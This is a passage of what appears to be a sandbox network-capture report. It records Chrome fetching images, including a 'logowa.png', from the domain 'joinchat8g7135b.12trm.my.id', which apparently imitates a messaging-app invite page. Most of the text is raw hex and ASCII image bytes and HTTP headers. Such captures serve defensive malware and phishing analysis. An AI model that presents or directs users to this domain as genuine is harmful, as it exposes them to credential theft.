                          2024-05-27 22:30:17 UTC1378INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 2d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                          Data Ascii: ExifII*Duckyd-http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xm
                          2024-05-27 22:30:17 UTC1378INData Raw: 4f 0b aa 6c 48 ce a1 94 84 b2 e1 8f 12 47 25 0d ea 07 25 ee 3e 63 bf 71 d1 5e fb 9d 71 61 ae 6f 11 b0 47 21 0f 2a 79 8a e3 39 12 e5 cf 18 ef e9 d0 69 e5 2a 71 f2 4d 29 c4 e5 79 a2 bf 13 f3 5e 40 e0 f4 04 e8 11 df a5 a7 15 68 9a 28 35 9a da 91 88 bd a5 02 4f 3a 4a 25 69 cd 81 c0 fc ad 80 49 c1 c6 3a 0d 68 3d e9 ae 1a fc cb 79 2a 11 e9 3f 0d 6b 10 ec 25 5a c7 8a 78 9d d3 04 8c 2f cf 03 38 00 31 ed d1 5d b5 da 46 a2 00 ef 66 d7 52 3c 0f b2 d3 69 7d cf 0c 7d 35 f1 bb 03 8c 06 ce 4f 71 9e 83 cf ee 51 46 7c cf 60 c2 55 31 ae d8 98 fb 69 d1 58 23 2b 31 71 42 a8 fd 99 82 94 52 0e 48 c7 44 ca 87 45 06 f0 9e cc 9a 35 04 ab 60 e5 49 57 46 52 19 29 36 1d d2 93 70 0a 91 dc 11 d0 24 2f b5 aa 3c 7b 71 ae d4 87 65 db d6 9f 95 99 7f fc 27 55 3f 55 69 8f 53 35 75 6f 5c 2f
                          Data Ascii: OlHG%%>cq^qaoG!*y9i*qM)y^@h(5O:J%iI:h=y*?k%Zx/81]FfR<i}}5OqQF|`U1iX#+1qBRHDE5`IWFR)6p$/<{qe'U?UiS5uo\/
                          2024-05-27 22:30:17 UTC1378INData Raw: ab af 08 89 5a bc 96 95 55 2c 49 00 a8 c7 7e 5d 05 7d 51 35 d6 d7 59 32 b4 96 12 59 b2 9c ab 22 a2 85 2a 7b 64 10 3a 28 5b 1a 3a db 2f ce aa fc 8a 78 9c ce d6 90 ac b2 5b c5 61 27 41 69 64 9f a5 b2 3b 9f 81 39 06 c0 00 00 00 00 00 00 03 00 01 d8 00 07 a0 1d 02 bb 70 a5 84 9e 2e b3 be bd 7c d1 67 05 a6 c7 83 c9 e7 55 04 31 9d 27 42 3b 77 07 07 e1 8e 80 49 1d bb 5e 16 db f0 49 35 8b bc a3 af 4a 5b 95 9e 6f 13 5a 56 92 86 02 ca 8c 02 85 f5 6c 92 70 3a 0a 1d 07 ba 09 69 b7 42 d6 bb e0 c8 6e ae 94 64 aa 43 2e 36 57 52 95 76 ee 49 7a be 71 80 02 a8 f9 93 d4 e8 6f 5f 55 35 fc 8c 1e 95 ad 4a 9a de c5 5a b4 e2 30 80 f0 54 45 44 04 e1 55 55 46 4f 6e e7 aa 33 bb ae db 31 55 42 81 e7 69 59 16 aa 5a 4e d2 70 e1 2a a3 bf 16 c7 a8 f4 38 3d f1 8e 88 e6 9e bd 20 36 1e a6
                          Data Ascii: ZU,I~]}Q5Y2Y"*{d:([:/x[a'Aid;9p.|gU1'B;wI^I5J[oZVlp:iBndC.6WRvIzqo_U5JZ0TEDUUFOn31UBiYZNp*8= 6
                          2024-05-27 22:30:17 UTC1378INData Raw: c9 b0 49 ed 8e 80 9b 4c 2b b5 a5 ac 98 2e 96 fb ba e3 d6 70 8c e8 aa c7 e4 69 77 55 1f 30 1b e4 7a 0a 3d 14 9d b5 19 eb e7 8e c5 75 ac 66 25 46 9a cd d2 b3 56 66 40 f3 aa 3a f2 99 73 c5 86 08 c9 07 23 b7 40 4d 78 4f 59 3c 4a ec ec cc f5 a3 d1 81 ad 68 ed 97 a3 e0 28 c9 27 1d 80 00 60 00 00 03 a0 63 a0 89 a9 26 f6 fb 4e 5b 12 4a d3 69 8c 97 dc 95 99 ab 7a 2c e9 6e 1b 4b 66 6a c9 99 24 c4 71 66 9e 7b 00 bd 87 44 39 b9 b5 aa 12 da 8d bf af ab b3 48 51 53 9d e6 95 9b 51 19 52 81 19 d5 b2 a4 e4 7e ce 8a ef b7 56 75 d3 81 9a 2c 84 d4 c0 cd 0f 24 9b c1 8c 68 b3 61 90 f3 0e 87 8b 7c 47 7e 83 2d ed e8 db 47 63 cb 40 ad 79 ec bc 31 3e 0d b1 28 8d 74 a7 32 86 aa 04 94 65 41 c1 23 f1 20 90 e5 5f c5 3a 53 83 d3 82 33 89 cd 4b 51 ca 82 42 22 8f 56 6c 60 7e 3d 15 17 4f
                          Data Ascii: IL+.piwU0z=uf%FVf@:s#@MxOY<Jh('`c&N[Jiz,nKfj$qf{D9HQSQR~Vu,$ha|G~-Gc@y1>(t2eA# _:S3KQB"Vl`~=O
                          2024-05-27 22:30:17 UTC1378INData Raw: 4e cd 05 d4 2c ac e3 6d 17 ef 5a 47 04 8e 1a b8 82 39 5f 8e 7b 1f 87 c3 a0 b2 ee 93 52 f4 75 44 51 96 77 60 aa a3 e6 59 88 00 74 52 3f d4 b5 5b fd 21 b1 b0 3d 79 eb ea 6c da 47 f6 59 24 62 d9 cf c1 8f 44 77 fa 8c 47 fa 92 dd 90 f8 97 d1 db 2a 3e 7c 9d 22 e8 a3 f1 27 1d 03 10 da d6 d9 04 eb de 56 c7 e6 13 75 66 5f 86 1d 41 e4 87 f0 20 74 50 6b a8 5e a6 f1 d8 b6 ad 5d 42 54 c8 49 d2 a1 73 c0 bc ed 3a 2f 34 ce 03 0c 1c 76 39 18 c1 05 d7 d7 4d 64 28 85 dc bb b5 6b 5a 10 d4 ad 5f 1c a9 42 02 af 22 00 00 00 00 00 00 00 1d 15 2b de f9 78 e2 48 43 11 e6 27 cb c7 c1 f7 5c 57 ed 4d f9 fe 97 0f cf c7 c9 fa 7e 4e 39 f8 74 4a 5b 51 e3 0d b1 6a 2e f7 89 75 78 c6 96 d3 56 45 a5 68 4d f8 d3 db f5 fe d8 02 92 4e f9 c7 ae 0f af 41 5f fa 9e 87 c7 6a 4a 7e 4e 4a 1f fb ae 14
                          Data Ascii: N,mZG9_{RuDQw`YtR?[!=ylGY$bDwG*>|"'Vuf_A tPk^]BTIs:/4v9Md(kZ_B"+xHC'\WM~N9tJ[Qj.uxVEhMNA_jJ~NJ
                          2024-05-27 22:30:17 UTC1378INData Raw: d0 7d 4e 83 93 ae 24 c8 b3 7d 46 3a 8e 88 49 98 31 55 08 d3 2d 96 f1 bc 8a b0 07 b8 ce 0f 71 d1 46 d9 89 d8 d7 bc 03 99 1b 4a 92 f2 05 0c 53 c8 a5 73 c4 f6 3d 8f e1 fb ba 04 87 f5 6e 24 05 d1 9f 85 14 22 0f 2d 57 6d 86 72 39 93 26 d4 52 00 03 22 84 13 9c 90 3b 90 6d 58 dd 6d b1 b3 b1 e3 47 d8 11 1e 09 12 e9 31 20 c0 33 55 95 1a 94 60 d8 38 0a a0 01 80 7b 92 07 d8 d9 8e aa 2b d9 98 2b 3a cd 42 4e b5 76 76 04 85 59 c5 1d c9 c2 93 e9 d8 0e 8a 9f 7f 76 9f 8e 8f a4 83 70 c6 4f 6b b7 33 28 c2 73 56 76 16 a1 46 2b 66 0b f4 a6 39 7c 4e 07 7e 82 85 a4 bb 5a d5 8d 39 2a 6c 41 e4 f8 38 60 b6 99 46 c1 c7 66 01 ba 04 8e be f5 c4 a3 b5 5d 7f 0c e9 2a 52 91 5a 0a ec 98 51 6b 35 28 df 46 b8 67 40 5f 0c f9 19 03 19 c8 23 7b 1b bc 9c 6a 69 bc e9 b6 d4 f1 b9 1f a8 9a 8a 14
                          Data Ascii: }N$}F:I1U-qFJSs=n$"-Wmr9&R";mXmG1 3U`8{++:BNvvYvpOk3(sVvF+f9|N~Z9*lA8`Ff]*RZQk5(Fg@_#{ji
                          2024-05-27 22:30:17 UTC1378INData Raw: 99 60 be 5e 01 94 a0 72 08 4a 71 72 50 9e c1 c0 cf 41 f3 7a e9 ac d4 8c f6 87 8f 52 7c a5 6a 17 b2 4f 6f 61 59 3c 51 f7 3d 76 6f 1e bd d0 8e 4c 1f 22 8f 82 ac 41 20 91 f6 20 00 00 50 02 80 00 00 00 00 03 00 00 3b 00 07 45 4d de 98 d7 0d ee 51 01 6d ae bc f6 38 f6 1b 3a 89 de d3 a0 03 eb 69 cf 2d 33 82 43 0c 7a 12 09 0f d2 73 bc 9e 74 55 a4 aa 85 59 4f 75 65 61 f3 1f 31 f1 1d 14 90 d5 dc 41 e3 9f b8 bf 8c 76 53 5d 79 57 61 57 e0 3c c4 aa 3e 3e 6c 8c c7 e2 49 ef d1 04 96 84 27 41 77 34 d9 d8 5c f1 be cb f9 1d 33 eb e2 5c 2c 61 9f 8f 8d 57 3d 15 cd e8 d6 9f 6d 59 4d 6c 75 76 45 cc 19 82 79 57 c3 69 7d 2c df 40 a4 cd 43 2f 2e d9 5f 87 62 03 3a 92 af 9f 6b 6a b2 fb 7f b8 10 55 81 64 77 1e 15 a0 35 b1 99 69 f9 69 e4 0b 85 66 01 50 77 e8 82 6e d6 a8 92 9c 08 4b
                          Data Ascii: `^rJqrPAzR|jOoaY<Q=voL"A P;EMQm8:i-3CzstUYOuea1AvS]yWaW<>>lI'Aw4\3\,aW=mYMluvEyWi},@C/._b:kjUdw5iifPwnK
                          2024-05-27 22:30:17 UTC1378INData Raw: d7 b7 3a 6c 79 1e 7a fa f4 f1 bc cc d9 a7 87 bd 7c 75 3f 42 15 2b 9c 96 53 8e 88 6f 4f 42 5a 98 6e 46 b6 13 12 f2 15 54 59 cb 21 bc 30 92 01 38 47 90 07 03 b9 23 2c 58 f7 e8 1e 20 1c 64 03 83 91 91 9c 1f 98 f9 1e 8a 5f 6c ed 88 9f b2 48 3d c9 01 7e e5 dd 24 a0 e7 2c 7c 6a cc d8 f9 76 cf cf a0 f9 ca 46 cb 58 ea ed aa cf 7b 7f 61 a8 bb f1 bd 28 08 f0 a2 ec ac b8 47 4f c4 c9 3d 69 00 8c 1d 48 c3 1e 44 1e a2 3e 8b 4f 52 7a 51 f0 cd ed 40 58 bb 3d ea f6 a3 b9 00 16 66 73 db 21 47 60 00 fc 3a aa 4d 77 6f 4f 73 3a b3 12 3a c8 2a 28 4a 39 af 28 ce 2c ee 28 28 10 2f 97 65 50 2f 02 49 56 ef db a0 26 af 11 bd ee 61 f0 2c d5 83 20 3f 98 ea 0d 58 ac ca e7 b9 98 d8 15 1f 83 67 a2 29 74 56 59 95 14 bb b2 a2 28 cb 33 10 aa a3 e6 58 e0 01 d0 4e 9b fd f6 d4 af 30 4e a6 a8
                          Data Ascii: :lyz|u?B+SoOBZnFTY!08G#,X d_lH=~$,|jvFX{a(GO=iHD>ORzQ@X=fs!G`:MwoOs::*(J9(,((/eP/IV&a, ?Xg)tVY(3XN0N
                          2024-05-27 22:30:17 UTC1378INData Raw: 8e 3c b6 8d 97 c5 b7 04 cf d6 58 12 00 cf 1f 94 30 b1 a7 7a 59 28 96 0a bb 1a f5 6d 7b 84 c8 42 ea a9 45 a2 03 92 12 d2 a2 b8 07 38 e5 8c 9c 75 54 38 77 f7 1d f6 5f ca 23 a3 26 f9 79 97 ee aa f9 fe f7 86 f3 fd d8 e8 30 be e2 8d ba 74 fc 4c 3f 55 e0 29 cd 32 6a 9a e3 65 b3 1c f9 16 5e 33 80 e7 b1 6e df 10 48 1b 67 55 a8 eb b1 af 41 1d a9 a9 45 76 5e 72 ac f3 c8 c3 62 60 a9 79 96 ee 08 21 94 f7 07 b9 04 27 54 ea b5 0b 7b 9c 6b a6 ee ab 3a ba ec 58 7b 76 ca a1 3c 05 2d 26 9c 8a fd 58 c5 95 09 1d b0 47 44 33 38 5f 5b 3f d3 ce ad 75 1c 9a 4f 5a 8c f1 48 97 ee c3 5e f1 4b aa c1 9b b8 4f 19 00 93 83 8e c0 09 e1 f7 0a 65 df 71 35 db f8 63 af 14 ac 40 ff 00 d6 d2 eb e6 b1 3f 35 f1 0f c3 e3 d0 61 e1 bb 6f 1a 6c d7 53 c1 3b 46 f4 69 4e a8 f4 3a f4 5b cc 71 7a ba c9
                          Data Ascii: <X0zY(m{BE8uT8w_#&y0tL?U)2je^3nHgUAEv^rb`y!'T{k:X{v<-&XGD38_[?uOZH^KOeq5c@?5aolS;FiN:[qz
                          2024-05-27 22:30:17 UTC1378INData Raw: 28 ab 70 95 da 6f 0f 1f ba de 76 d9 c3 aa b2 3f ea 3d b3 f4 a7 15 e4 07 c0 e0 8a dd 14 2b da 7a f1 a5 ea 71 39 a9 66 c0 c9 38 f4 55 1e ac ec 7b 01 ea 49 c7 40 ae 96 cd ec d6 96 d4 92 36 90 8d 02 21 2c 04 76 10 b2 06 27 d5 d1 d1 d0 91 d8 95 ed d1 0f f4 54 bd 0a 6f bd 2c 36 d1 82 05 04 16 9c e6 16 c6 94 0d 38 14 77 35 80 98 52 19 bb e4 fe 38 04 6f 6f 76 32 76 d7 a4 6b 54 32 46 d8 64 f1 f0 8c 76 28 da e8 d4 0d 44 a3 87 75 39 08 18 80 09 f9 64 30 3d be c5 67 0a ee b5 75 26 d3 2b 33 15 5b d1 64 c1 a7 3b ec 73 22 88 0a 8c e1 15 9b 1d c9 c9 e8 28 f9 13 98 97 34 f2 14 34 13 e4 39 94 52 14 b8 4c f2 28 19 80 27 d3 27 a2 83 b5 1d 7a cf 96 ca e5 23 ca a1 c3 3a 3c f8 a3 72 65 79 32 d0 7d 19 c8 07 b8 e8 14 8d ec 23 35 d4 f6 ca 24 02 2f 88 52 da d1 1e 3c 0e 04 22 52 ce
                          Data Ascii: (pov?=+zq9f8U{I@6!,v'To,68w5R8oov2vkT2Fdv(Du9d0=gu&+3[d;s"(449RL(''z#:<rey2}#5$/R<"R


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          25192.168.2.44976935.190.80.14435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:17 UTC480OUTPOST /report/v4?s=oUTLFvZiTMRAoK3Q93kizLBJ0hjl6jJKmwAUq%2ByJgtbCAC5MaNw%2BrPwdruGI22QcS0CFWdFYPpq3vlpyyniKdBb5IgK7XY3Bq2JL7ttD8hM0RFcCBZWo9Btb9hnLcuGWqiOI5ug%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 498
                          Content-Type: application/reports+json
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:17 UTC498OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 6f 69 6e 63 68 61 74 38 67 37 31 33 35 62 2e 31 32 74 72 6d 2e 6d 79 2e 69 64 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 33 34 2e 32 33 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d
                          Data Ascii: [{"age":1,"body":{"elapsed_time":1105,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://joinchat8g7135b.12trm.my.id/","sampling_fraction":1.0,"server_ip":"104.21.234.230","status_code":404,"type":"http.error"},"type":"network-
                          2024-05-27 22:30:17 UTC168INHTTP/1.1 200 OK
                          content-length: 0
                          date: Mon, 27 May 2024 22:30:17 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          26192.168.2.449771188.114.96.34435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:18 UTC643OUTGET /vhsfhqpdhdsih6/img/logowa.png HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:18 UTC676INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:18 GMT
                          Content-Type: image/png
                          Content-Length: 152291
                          Connection: close
                          Last-Modified: Thu, 25 Aug 2022 04:39:28 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 3333
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c6RIc6ACdz56YDTQYa5xnbXhr9YhF6DxZf3AhdLSysB4jl5fj%2Bnfoy3ilwZDPm4J8c3zapAM0wZUUiHjRn0eSF1g4t8Kiui7%2FOXI83DChGjxdJh%2BZlYB4mgfDWuddcZTPndrniYnq1BCAxjddQg%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972db2c5019bf-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:18 UTC693INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 e8 00 00 03 e8 08 03 00 00 00 7a 7d 24 d6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 00 00 00 03 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 03 03 03 04 04 04 04 04 04 00 00 00 00 00 00 06 06 06 00 00 00 16 16 16 fd fd fd 78 78 78 54 54 54 3f 3f 3f 67 67 67 f4 f4 f4 88 88 88 e8 e8 e8 f0 f0 f0 f6 f6 f6 fa fa fa 32 32 32 ed ed ed df df df e4 e4 e4 f7 f7 f7 d9 d9 d9 99 99 99 92 92 92 a7 a7 a7 c3 c3 c3 f9 f9 f9 d8 d8 d8 a9 a9 a9 cd cd cd c9 c9 c9 ba ba ba cf cf cf bf bf bf b0 b0 b0 ba ba ba c6 d2 c6 fd fd fd fd fd fd ff ff ff fc fc fc f9 f9 f9 f8 f8 f8 f7 f7 f7 f5 f5 f5 ed ed
                          Data Ascii: PNGIHDRz}$gAMAasRGBPLTExxxTTT???ggg222
                          2024-05-27 22:30:18 UTC1369INData Raw: 16 1b 9c 0b ed ee ee 2a ac 16 21 a1 10 22 a5 11 17 99 08 09 8b 01 27 aa 14 1b a1 0e e3 f4 e2 13 95 05 ec f7 eb da f0 d8 0d 8e 02 f5 f5 f5 cf ec cc 35 b4 24 01 93 00 c4 e7 c1 f2 f9 f1 f6 fb f5 f9 fc f9 b8 e2 b5 0f 92 04 ad dd aa a0 d8 9c 95 d3 90 0e 9c 0a 52 bc 44 48 ba 36 7b ce 72 49 a9 48 6d c9 61 89 d3 7f 59 b3 58 5f c4 51 2f 9c 2d 78 c1 77 3d ae 35 68 ba 67 24 94 24 3b 9f 3a 87 c9 86 20 9e 0e 12 88 12 19 8e 19 0a 83 0a f7 f6 f6 c4 bf 2f 5f 00 00 00 35 74 52 4e 53 00 30 1d 08 04 0f 19 06 02 13 27 0c 2b 3a 35 40 22 20 47 24 53 fa 79 67 46 53 e9 63 d5 e3 ee f7 54 dc c6 ce f1 bf 92 79 7a b2 f5 b2 90 ba 9a a9 a8 94 a1 87 d4 58 ce d3 29 00 00 20 00 49 44 41 54 78 da ec bd 4b 68 5c 47 da 3e fe 4b e6 9b cb 97 f1 64 92 c9 c8 ce 38 be c4 b7 38 71 ec c9 e5 83 a3
                          Data Ascii: *!"'5$RDH6{rIHmaYX_Q/-xw=5hg$$;: /_5tRNS0'+:5@" G$SygFScTyzX) IDATxKh\G>Kd88q
                          2024-05-27 22:30:18 UTC1369INData Raw: c9 7c 38 5b e9 3a b8 67 f7 7e 05 f7 37 11 ee 8a dc 99 db b5 21 2f e2 6f e1 71 87 12 98 5c 81 dc d8 ea 64 aa 6f 3f fa fe a1 7d 07 d9 30 97 76 b9 20 6d 06 37 b0 ef 59 82 31 da e5 67 d9 59 d7 db 74 57 f4 ea ca 59 83 61 b6 d5 c1 40 67 a5 ee 2c be 9c 3d 5b e1 0e a3 9b 0f d7 7d 16 e9 5e 2d ed da 79 e0 d8 87 87 99 dc 01 ed ca 6f 57 d4 2e c1 fe db 00 f6 50 9e 47 98 b3 4f 0e 4c 6e 19 eb c0 e3 db 8f 1e db a5 5c f1 6e 0e 7f 69 6e ed 66 70 da f0 15 74 5c 71 0a bb e3 0e 37 eb cf dd ee be 67 ed 6d bb b9 33 30 e6 02 ba f5 15 7a ef 8e 53 e7 7d bf 72 dd 25 da 5f 63 6a 47 b0 07 ac 87 f2 3c 82 fc b7 28 bc 31 93 93 e8 96 82 fc 4f 3b 8e be 7f 60 77 17 84 b4 b5 1d ad 69 d7 28 6c 67 c1 f6 a6 50 9a 61 76 32 b8 49 2f 37 18 3e 9b ed 25 2a 4e 9f a0 37 39 db 9d 59 d9 6d 0b 7c da 61
                          Data Ascii: |8[:g~7!/oq\do?}0v m7Y1gYtWYa@g,=[}^-yoW.PGOLn\ninfpt\q7gm30zS}r%_cjG<(1O;`wi(lgPav2I/7>%*N79Ym|a
                          2024-05-27 22:30:18 UTC1369INData Raw: ea a3 85 57 35 ef b8 d5 5f 5c 02 8c 04 ad bf 12 9c f5 50 7e 11 36 37 36 3b 91 f9 b1 bd 39 b0 70 81 51 de 7a f6 6c b7 45 79 f3 28 fd 65 95 fd b3 fb 0c ad 1b 0b 3e 40 3d 94 c7 c5 e6 36 cc df 3c ba ff e0 43 f9 a4 06 4f d5 ad 40 5b 75 a3 07 d8 98 c3 51 ce ad b5 ba 99 53 2f b7 3a 78 ea ad 33 d4 2d 67 3d 40 3d 94 c7 c7 e6 ca 66 ff c3 1f df 78 7f 4f 4b b4 45 9d 22 b3 bc 25 a0 dd 64 77 50 dd 5a 82 af 76 b8 75 fe 26 d5 aa 0e b8 c1 3c 15 7f e0 d0 3a 58 f0 81 d5 43 79 5c 42 3b c1 5c 0f 4c ab e6 34 df 72 d6 7e af 0a f6 2a 6f 09 60 ab 9b 97 00 fc e7 ad 57 54 37 d4 df 54 ab be 13 ab 56 3b e8 64 aa 7e 8f 27 fd b0 97 2c f8 17 5e 78 e9 b5 57 81 d5 7f 1f 58 3d 94 c7 20 b4 6b d7 fc e8 ae 98 1a 63 79 2b f9 70 13 e4 5a dd b8 f1 dd c1 29 57 1f 75 d0 bc e5 1e 62 df 23 ef 6c 77
                          Data Ascii: W5_\P~676;9pQzlEy(e>@=6<CO@[uQS/:x3-g=@=fxOKE"%dwPZvu&<:XCy\B;\L4r~*o`WT7TV;d~',^xWX= kcy+pZ)Wub#lw
                          2024-05-27 22:30:18 UTC1369INData Raw: 8f 72 99 8c 16 bc c6 32 75 45 70 d9 11 fb 03 78 2f d9 1b c1 1b 8e b7 21 3d 87 a8 8c 77 9d 5c 84 f4 6d cf 31 8e ab bf 1a c6 ab 87 b2 71 ab 5d b1 f9 6f 00 e6 af 1f 55 01 b5 32 a2 ba 5a 46 db 9d 69 ae 4a 9c 8e 90 60 bf 18 db 2a e0 09 90 18 29 6c 44 f4 3d 42 9a 45 b3 1f bd dc 32 45 eb 94 51 4f a8 60 a0 83 00 10 31 87 e9 4e a0 4c 7f 55 aa 28 c2 57 72 af 11 d5 e8 68 54 98 b3 ab cc fa 74 fe b0 59 99 78 bd 4a a7 08 bd 82 22 5b 3c 75 36 24 22 30 0b d8 1a 41 50 aa ab a8 f2 e5 56 d0 9e 81 ea d0 12 40 b8 93 a3 83 b6 44 99 4e 91 eb 52 d7 00 37 94 ae 5e 99 46 b8 ad ea 10 54 02 5f 84 14 0e dd 01 9c 75 19 8d 2a 55 35 74 40 e9 09 1c 79 97 59 fd d5 17 43 ac 2d 94 0d 45 d4 50 83 53 43 57 fe a8 b2 e0 c8 3a 87 37 8d 6a 60 a8 08 ff ab f6 59 45 b4 69 d8 a1 8d 1c b1 79 1f a1 81
                          Data Ascii: r2uEpx/!=w\m1q]oU2ZFiJ`*)lD=BE2EQO`1NLU(WrhTtYxJ"[<u6$"0APV@DNR7^FT_u*U5t@yYC-EPSCW:7j`YEiy
                          2024-05-27 22:30:18 UTC1369INData Raw: e7 fc fd 23 14 51 2b 5b 2a 54 59 70 62 55 37 f6 8a 16 bd ab e5 28 f2 fb c2 55 11 09 13 12 57 c5 de be 92 51 ad 6c 71 c0 01 5f d9 06 5c 45 c7 ee 25 f7 53 68 bf d2 d6 42 2e eb 7a 73 14 3a c7 1e 28 57 84 df 9f 78 cd fa 96 a2 1d 0d 06 2a fb bb 9a 6a d5 77 c1 15 fb 98 d5 aa 75 fb ca 91 4e c4 8b 2a 67 a5 ab 1e f4 f7 50 b2 56 fb eb 47 77 76 6d de a5 f5 53 57 24 da 60 07 be ac 07 41 9d 72 5e e7 e7 e5 db a5 bc 99 8a dc 92 f8 ae be ec 76 1d e5 e8 d1 16 1c ec a2 47 b0 06 fb 3d c0 5c 6b ed 10 52 7b e3 80 05 73 47 f4 f6 06 87 aa ed 90 5e 16 66 b9 03 c3 b2 75 9c 6a 3b 14 54 3a 01 7d 55 3a ef 6d 3a 83 8a 07 7a 55 1f 29 57 32 3b 94 45 ea 8c bf 5b b1 82 7a e5 dc 30 a4 eb d5 54 5b 5a ee 49 87 5e 81 8e aa 53 a8 2d 88 72 c1 6a 27 3a 57 21 b5 43 07 2b d1 63 2a e5 8d 72 67 d2
                          Data Ascii: #Q+[*TYpbU7(UWQlq_\E%ShB.zs:(Wx*jwuN*gPVGwvmSW$`Ar^vG=\kR{sG^fuj;T:}U:m:zU)W2;E[z0T[ZI^S-rj':W!C+c*rg
                          2024-05-27 22:30:18 UTC1369INData Raw: ad ce 20 32 9d 29 77 91 70 a5 68 4c c5 ea 76 25 74 d1 31 de 3e be 19 b1 de 30 31 3d 4c ec 3c 13 5c 08 67 11 27 7a 47 da e8 c8 a1 1d ae a7 1e 90 f1 8c 9a ed 5a 6c 17 6c 10 43 03 03 48 c6 b1 b0 34 e3 98 09 d7 b2 4b e3 24 89 5d 96 4e 5a 19 9c 59 01 3b 49 72 42 4d 06 f2 b1 7b b8 94 4e af 5d ba 7e f3 de fd 75 0b e0 0e b4 01 db 43 20 b9 61 99 ef ac 2c a4 7f e9 5e 00 f9 29 3a 94 c3 f1 58 eb b4 82 fb 95 0b 09 cd cf 11 67 2f 3b d6 37 84 a1 9c 58 40 8c ed ab 8f b3 b7 2b ce ae f0 59 47 ce 9e b1 cf 1d 8a 13 ae 55 7b ea 26 51 2e 68 72 cf a6 0a c7 de f9 be 58 c0 3c b6 cc f7 d8 69 af 72 2b cb 4a 34 34 9b e4 b5 ce 96 b8 8f 23 9f 72 94 c1 0b 61 3c b9 76 f1 c2 95 5b 77 6f af 8f 7c 61 30 2e 21 8e fc 3c e4 41 77 69 69 09 ff 63 99 76 ff 97 d4 aa 92 c4 3c 1c 41 13 ff 82 cd f0
